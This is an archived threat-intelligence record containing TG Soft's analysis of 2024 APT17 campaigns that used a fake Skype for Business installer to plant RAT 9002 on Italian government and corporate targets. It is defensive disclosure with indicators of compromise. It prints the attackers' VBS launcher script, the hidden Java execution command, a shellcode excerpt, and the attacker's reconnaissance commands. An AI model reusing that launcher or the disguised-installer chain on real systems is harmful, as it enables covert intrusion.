{ "id": "e9242090-1464-4461-90b3-0badf807db66", "created_at": "2026-04-06T00:08:42.169983Z", "updated_at": "2026-04-10T03:37:58.840435Z", "deleted_at": null, "sha1_hash": "c30b35ebd42bc0ea2ddc1637c455161f7aa03683", "title": "Italian government agencies and companies in the target of a Chinese APT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 531007, "plain_text": "Italian government agencies and companies in the target of a\r\nChinese APT\r\nBy TG Soft S.r.l. - https://www.tgsoft.it\r\nArchived: 2026-04-05 19:25:39 UTC\r\nOn June 24 and July 2, 2024, two targeted attacks on Italian companies and government entities were observed by\r\na Chinese cyber actor exploiting a variant of the Rat 9002 in diskless mode. Other variants have over time been\r\nnamed as Rat 3102. These activities are associated with the APT17 group also known as \"DeputyDog\".\r\nThe first campaign on June 24, 2024 used an Office document, while the second campaign contained a link.\r\nBoth campaigns invited the victim to install a Skype for Business package from a link of an Italian government-like domain to convey a variant of Rat 9002.\r\nRat 9002 and Rat 3102 are notoriously linked to APT17, a Chinese cyber-criminal group known for:\r\nOperation Aurora (attributed to the Chinese government)\r\nOperation Ephemeral Hydra\r\ntargeted attacks on companies and government entities\r\nThe campaigns\r\nIn the figure the image of the Office document \"GUIDA OPERATIVA PER l’UTENTE.docx\" spreaded in the June\r\n24, 2024 campaign.\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 1 of 9\n\nThe Word document was created on June 18, 2024 by a user named \"ple\".\r\nThe July 2 campaign instead directly uses a link to the malicious URL.\r\nBoth campaigns invite the victim to connect to the following page:\r\nhttps://meeting[.]equitaligaiustizia[.]it/angelo.maisto.guest\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 2 of 9\n\nThe site mimics an official page for Equitalia Giustizia meetings and invites the user to download a customized\r\nMSI installation package for the Skype for Business software. There is also another legitimate link on the page:\r\nhttps://meeting[.]equitaliagiustizia[.]it/angelo.maisto.guest/MB9GVM5K which was most likely\r\nstolen/intercepted in a possible previous attack.\r\nMalicious URL details:\r\nDOMAIN meeting[.]equitaligaiustizia[.]it\r\nDomain creation date 2024-06-13\r\nBy accessing the root of the site, only the \"angelo.maisto.guest\" subfolder is present as can be seen from the image\r\nbelow:\r\nInstead, the malicious package is downloaded from the following Microsoft URL:\r\nhttps://skypeformeeting[.]file[.]core[.]windows[.]net/skypeformeeting/SkypeMeeting.msi?sp=r\u0026st=2024-07-\r\n04T11:10:14Z\u0026se=2024-08-04T11:10:00Z\u0026spr=https\u0026sv=2022-11-\r\n02\u0026sig=8djI9lFWxKmw5MBBk67DvQIMlyE%2F6jME24rrv0xlZs8%3D\u0026sr=f\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 3 of 9\n\nThe custom MSI package that is downloaded has the following features:\r\nName: SkypeMeeting.msi\r\nSize: 39386624 byte\r\nSHA-256: 28808164363d221ceb9cc48f7d9dbff8ba3fc5c562f5bea9fa3176df5dd7a41e\r\nInfection chain\r\nIn the downloaded MSI package some files to be considered interesting are the following:\r\nSkypeMeetingsApp.msi (original MSI package for installing Skype for Business)\r\nvcruntime.jar\r\nvcruntime.vbs\r\nvcruntime.bin\r\nBelow is a graph of the infection chain of the campaigns observed:\r\nThe execution of SkypeMeeting.msi will therefore involve the installation of the original Skype for Business\r\npackage and the execution of the Java application called \"vcruntime.jar\" via the VBS script \"vcruntime.vbs\"\r\nwhich we see below:\r\nSet windowobj = createobject(\"wscript.shell\")\r\nSet Args = WScript.Arguments\r\nstrCommand1 = \"java.exe -jar \"\"\" \u0026 Args(0) \u0026 \"\"\" \"\"\" \u0026 Args(1) \u0026 \"\"\" \"\"\" \u0026 Args(2) \u0026 \"\"\"\"\r\nwindowobj.Run strCommand1,0,False\r\nstrCommand2 = \"msiexec /i  \"\"\" \u0026 Args(3) \u0026 \"\"\"\"\r\nwindowobj.Run strCommand2,1,False\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 4 of 9\n\nThe Java application will then be executed with the following command line:\r\njava.exe -jar \"C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\jre-1.8\\bin\\vcruntime.jar\" \"dwrsvsa\" \"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Roaming\\jre-1.8\\bin\\vcruntime.bin\"\r\nThe \"vcruntime.bin\" file, of which we see an excerpt below, contains a shellcode encrypted with RC4:\r\n488f162e-1aaa-060c-4ec4-c6f23c113526\r\n4b2cbd6d-7056-b972-b13b-4c593c3b4ccc\r\n11af7b56-c890-d2ac-3606-d8bcf19fc7a0\r\n35381e2a-bfdd-0df3-ff41-9484f1a74fcc\r\n112c1a02-bfd5-09d3-ff45-039758ef6aec\r\n407e7f28-9ac5-841a-1b25-444b919f5e47\r\n[...]\r\n7d28f699-fb0b-d48a-b535-74419d696584\r\n5a5be410-ded9-1e20-8ca6-c1e49ca94ecc\r\n1178682c-613f-7e65-2100-000000000000\r\nThe Java application decrypts and executes the shellcode. Below we see the first step which involves deciphering\r\nthrough a simple XOR cycle:\r\nAfter decryption, the shellcode decompresses and executes the RAT 9002 as we see in the figure:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 5 of 9\n\nThe RAT 9002\r\nThe RAT 9002 performs proxy functions to monitor network traffic, see below some excerpts from the malware\r\ndump:\r\nIn this first excerpt we see the command and control server.\r\nIn this second excerpt we see the string \"Dog create a loop thread\" characteristic of the RAT 9002.\r\nIn this third extract we see the name of the RAT project.\r\nThe variant of RAT 9002 analyzed contains the value \"20240124\" as a date indicator as seen in the figure below:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 6 of 9\n\nThis value indicates that the malware, although old, continues to be actively developed in 2024.\r\nThe RAT 9002 Trojan is a modular malware that, based on the cyber actor's needs, downloads additional diskless\r\nplugins that allow various features to be added to the malware. During the analysis of the sample in question, the\r\ncriminal submitted the following additional forms:\r\nScreenSpyS.dll -\u003e screen capture [creation date: 2018-07-19 06:27:00]\r\nRemoteShellS.dll -\u003e execution of programs [creation date: 2022-01-23 04:48:12]\r\nUnInstallS.dll -\u003e uninstallation [creation date: 2012-01-11 10:20:09]\r\nFileManagerS.dll -\u003e browse files [creation date: 2022-01-21 10:35:49]\r\nProcessS.dll -\u003e process management [data creazione: 2022-01-22 01:37:08]\r\nUsing the RemoteShellS module, the cybercriminal executed the following commands to discover the network:\r\nsysteminfo.exe\r\nipconfig /all\r\nnet user\r\nnetstat -ano -p tcp\r\nnet use\r\nnet view \\\\\u003credacted_ip\u003e\r\nping \u003credacted_ip\u003e -n 1\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 7 of 9\n\nThe analyzed sample communicates with its command and control server hosted on a domain that simulates a\r\nMicrosoft domain, below are the details of the C\u0026C server:\r\nDOMAIN themicrosoftnow[.]com\r\nIP\r\n137.74.76[.]92\r\n23.218.225[.]10\r\nPORTS\r\n80\r\n443\r\nUser-Agent\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/126.0.0.0 Safari/537.\r\nDomain creation\r\ndate\r\n2023-11-27\r\nCommunication with the command and control server takes place in an encrypted manner and then encoded in\r\nBase64.\r\nRelated\r\nThanks to Threat intelligence activities it was possible to correlate an executable file that was uploaded to\r\nVirusTotal from Italy on 5 July 2024 which appears to be the executable file version of RAT 9002.\r\nName: a.exe\r\nSize: 35328 byte\r\nCreation date: 2024-07-04 17:02:45\r\nSHA-256:de19e0163af15585c305f845b90262aee3c2bdf037f9fc733d3f1b379d00edd0\r\nThis sample also contains the value \"20240124\" as a date indicator. This sample may have been used to persist on\r\nan affected machine.\r\nConclusions\r\nThe two campaigns appear to be aimed at a government and/or corporate target.\r\nThe RAT 9002 used is associated with the Chinese cyber-criminal group APT17 called DeputyDog which appears\r\nto have been active since at least 2008. The malware appears to be constantly updated with diskless variants as\r\nwell. It is composed of various modules that are activated as needed by the cyber actor so as to reduce the\r\npossibility of interception.\r\nThe attack as a whole is particularly sophisticated and designed down to the smallest detail, the domains used are\r\nvery similar to official domains and even the creation of the malicious MSI package was carried out with care as it\r\ninvolves the installation of the legitimate Skype for Business software and in parallel the diskless version of the\r\nRAT 9002.\r\nThe initial MSI file is downloaded from a Microsoft distribution site to reduce the possibility of interception.\r\nThe use of legitimate links from government entities on the malicious page suggests that the cyber actor had\r\naccess to confidential information of some user belonging to previously affected Italian companies or entities.\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 8 of 9\n\nIOC:\r\nthemicrosoftnow[.]com\r\nmeeting[.]equitaligaiustizia[.]it\r\n137[.]74[.]76[.]92\r\n23[.]218[.]225[.]10\r\n28808164363d221ceb9cc48f7d9dbff8ba3fc5c562f5bea9fa3176df5dd7a41e\r\ne024fe959022d2720c1c3303f811082651aef7ed85e49c3a3113fd74f229513c\r\nd6b348976b3c3ed880dc41bb693dc586f8d141fbc9400f5325481d0027172436\r\nc0f93f95f004d0afd4609d9521ea79a7380b8a37a8844990e85ad4eb3d72b50c\r\ncaeca1933efcd9ff28ac81663a304ee17bbcb8091d3f9450a62c291fec973af5\r\nde19e0163af15585c305f845b90262aee3c2bdf037f9fc733d3f1b379d00edd0\r\nAuthors: Ing. Gianfranco Tonello, Michele Zuin\r\nAny information published on our site may be used and published on other websites, blogs, forums, facebook\r\nand/or in any other form both in paper and electronic form as long as the source is always and in any case cited\r\nexplicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web\r\npage from which textual content, ideas and / or images have been extrapolated.\r\nIt will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of\r\nsummary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by\r\nTG Soft of which we point out the direct link to the original information: [direct clickable link]”\r\nSource: https://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng" ], "report_names": [ "news_archivio.asp?id=1557\u0026lang=eng" ], "threat_actors": [ { "id": "2150d1ac-edf0-46d4-a78a-a8899e45b2b5", "created_at": "2022-10-25T15:50:23.269339Z", "updated_at": "2026-04-10T02:00:05.402835Z", "deleted_at": null, "main_name": "APT17", "aliases": [ "APT17", "Deputy Dog" ], "source_name": "MITRE:APT17", "tools": [ "BLACKCOFFEE" ], "source_id": "MITRE", "reports": null }, { "id": "a7aefdda-98f1-4790-a32d-14cc99de2d60", "created_at": "2023-01-06T13:46:38.281844Z", "updated_at": "2026-04-10T02:00:02.909711Z", "deleted_at": null, "main_name": "APT17", "aliases": [ "BRONZE KEYSTONE", "G0025", "Group 72", "G0001", "HELIUM", "Heart Typhoon", "Group 8", "AURORA PANDA", "Hidden Lynx", "Tailgater Team" ], "source_name": "MISPGALAXY:APT17", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def", "created_at": "2025-08-07T02:03:24.626625Z", "updated_at": "2026-04-10T02:00:03.605175Z", "deleted_at": null, "main_name": "BRONZE KEYSTONE", "aliases": [ "APT17 ", "Aurora Panda ", "DeputyDog ", "Group 72 ", "Hidden Lynx ", "TG-8153 ", "Tailgater Team" ], "source_name": "Secureworks:BRONZE KEYSTONE", "tools": [ "9002", "BlackCoffee", "DeputyDog", "Derusbi", "Gh0stHTTPSDropper", "HiKit", "InternalCMD", "PlugX", "PoisonIvy", "ZxShell" ], "source_id": "Secureworks", "reports": null }, { "id": "86fd71d3-06dc-4b73-b038-cedea7b83bac", "created_at": "2022-10-25T16:07:23.330793Z", "updated_at": "2026-04-10T02:00:04.545236Z", "deleted_at": null, "main_name": "APT 17", "aliases": [ "APT 17", "ATK 2", "Beijing Group", "Bronze Keystone", "Deputy Dog", "Elderwood", "Elderwood Gang", "G0025", "G0066", "Operation Aurora", "Operation DeputyDog", "Operation Ephemeral Hydra", "Operation RAT Cook", "SIG22", "Sneaky Panda", "TEMP.Avengers", "TG-8153", "Tailgater Team" ], "source_name": "ETDA:APT 17", "tools": [ "9002 RAT", "AGENT.ABQMR", "AGENT.AQUP.DROPPER", "AGENT.BMZA", "AGENT.GUNZ", "Agent.dhwf", "AngryRebel", "BlackCoffee", "Briba", "Chymine", "Comfoo", "Comfoo RAT", "Darkmoon", "DeputyDog", "Destroy RAT", "DestroyRAT", "Farfli", "Fexel", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Gresim", "HOMEUNIX", "HiKit", "HidraQ", "Homux", "Hydraq", "Jumpall", "Kaba", "Korplug", "Linfo", "MCRAT.A", "McRAT", "MdmBot", "Mdmbot.E", "Moudour", "Mydoor", "Naid", "Nerex", "PCRat", "PNGRAT", "Pasam", "PlugX", "Poison Ivy", "RedDelta", "Roarur", "SPIVY", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trojan.Naid", "Vasport", "Wiarp", "Xamtrav", "Zox", "ZoxPNG", "ZoxRPC", "gresim", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434122, "ts_updated_at": 1775792278, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c30b35ebd42bc0ea2ddc1637c455161f7aa03683.pdf", "text": "https://archive.orkl.eu/c30b35ebd42bc0ea2ddc1637c455161f7aa03683.txt", "img": "https://archive.orkl.eu/c30b35ebd42bc0ea2ddc1637c455161f7aa03683.jpg" } }